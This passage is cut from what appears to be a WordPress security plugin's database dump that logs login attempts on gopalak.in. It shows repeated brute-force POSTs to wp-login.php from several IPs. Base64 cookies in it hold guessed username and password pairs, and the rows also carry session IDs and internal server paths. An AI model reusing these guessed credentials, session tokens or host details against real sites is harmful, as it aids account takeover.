_wptn=c2l0ZW1hbmFnZXI7YWRtaW4zMjE%3D\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49254\";s:11:\"REMOTE_ADDR\";s:14:\"151.80.139.240\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"83\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745722373.831512;s:12:\"REQUEST_TIME\";i:1745722373;}}','151.80.139.240',1,'2025-04-27 08:22:55','2025-04-28 08:23:00'),(94381,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"81\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:298:\"_uid=rB8jg2gNlzgaXU4hAyPIAg==; _jwp=1; PHPSESSID=80ec78bc7c5a77e1727eed2a559b37a9; swpm_session=dc3f8b5b4eb3d2655f2ec62cc8106b05; wordpress_test_cookie=WP%20Cookie%20check; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=mKQLLMTxKzpXyPzBsF97Oh2eq5DNX4hf; _wptn=c2l0ZW1hbmFnZXI7YWRtaW41NDMyMQ%3D%3D\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49254\";s:11:\"REMOTE_ADDR\";s:14:\"151.80.139.240\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"81\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745722375.6385601;s:12:\"REQUEST_TIME\";i:1745722375;}}','151.80.139.240',1,'2025-04-27 08:22:57','2025-04-28 08:23:00'),(94382,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"82\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:292:\"_uid=rB8jg2gNlzgaXU4hAyPIAg==; _jwp=1; PHPSESSID=80ec78bc7c5a77e1727eed2a559b37a9; swpm_session=dc3f8b5b4eb3d2655f2ec62cc8106b05; wordpress_test_cookie=WP%20Cookie%20check; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=mKQLLMTxKzpXyPzBsF97Oh2eq5DNX4hf; _wptn=c2l0ZW1hbmFnZXI7YWRtaW44ODg%3D\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49254\";s:11:\"REMOTE_ADDR\";s:14:\"151.80.139.240\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"82\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745722377.4636071;s:12:\"REQUEST_TIME\";i:1745722377;}}','151.80.139.240',1,'2025-04-27 08:22:59','2025-04-28 08:23:00'),(94383,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"83\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:290:\"_uid=rB8jg2gNlzgaXU4hAyPIAg==; _jwp=1; PHPSESSID=80ec78bc7c5a77e1727eed2a559b37a9; swpm_session=dc3f8b5b4eb3d2655f2ec62cc8106b05; wordpress_test_cookie=WP%20Cookie%20check; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=mKQLLMTxKzpXyPzBsF97Oh2eq5DNX4hf; _wptn=c2l0ZW1hbmFnZXI7YWRtaW5AMTIz\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49254\";s:11:\"REMOTE_ADDR\";s:14:\"151.80.139.240\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"83\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745722379.2905879;s:12:\"REQUEST_TIME\";i:1745722379;}}','151.80.139.240',1,'2025-04-27 08:23:00','2025-04-28 08:23:00'),(94384,0,'a:2:{s:8:\"username\";s:7:\"wadminw\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2gONMk/dCUSAx+OAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38624\";s:11:\"REMOTE_ADDR\";s:14:\"103.90.232.143\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745761481.5830741;s:12:\"REQUEST_TIME\";i:1745761481;}}','103.90.232.143',0,'2025-04-27 19:14:43','1970-01-01 00:00:00'),(94385,0,'a:2:{s:8:\"username\";s:11:\"yanz@123457\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2gOOSg/dCUSAyDSAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40006\";s:11:\"REMOTE_ADDR\";s:12:\"163.61.72.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745762600.3975911;s:12:\"REQUEST_TIME\";i:1745762600;}}','163.61.72.36',0,'2025-04-27 19:33:22','1970-01-01 00:00:00'),(94386,0,'a:2:{s:8:\"username\";s:24:\"loggershell443@gmail.com\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2gOO1I/dCUSAyGdAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"122\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56228\";s:11:\"REMOTE_ADDR\";s:14:\"103.169.35.190\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"122\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745763154.6447489;s:12:\"REQUEST_TIME\";i:1745763154;}}','103.169.35.190',0,'2025-04-27 19:42:36','1970-01-01 00:00:00'),(94387,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53154\";s:11:\"REMOTE_ADDR\";s:13:\"66.108.76.186\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745959805.9157939;s:12:\"REQUEST_TIME\";i:1745959805;}}','66.108.76.186',0,'2025-04-30 02:20:07','1970-01-01 00:00:00'),(94388,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40456\";s:11:\"REMOTE_ADDR\";s:13:\"67.205.59.102\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745960108.8200581;s:12:\"REQUEST_TIME\";i:1745960108;}}','67.205.59.102',0,'2025-04-30 02:25:10','1970-01-01 00:00:00'),(94389,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51028\";s:11:\"REMOTE_ADDR\";s:13:\"195.161.69.18\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745960409.69824;s:12:\"REQUEST_TIME\";i:1745960409;}}','195.161.69.18',0,'2025-04-30 02:30:11','1970-01-01 00:00:00'),(94390,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 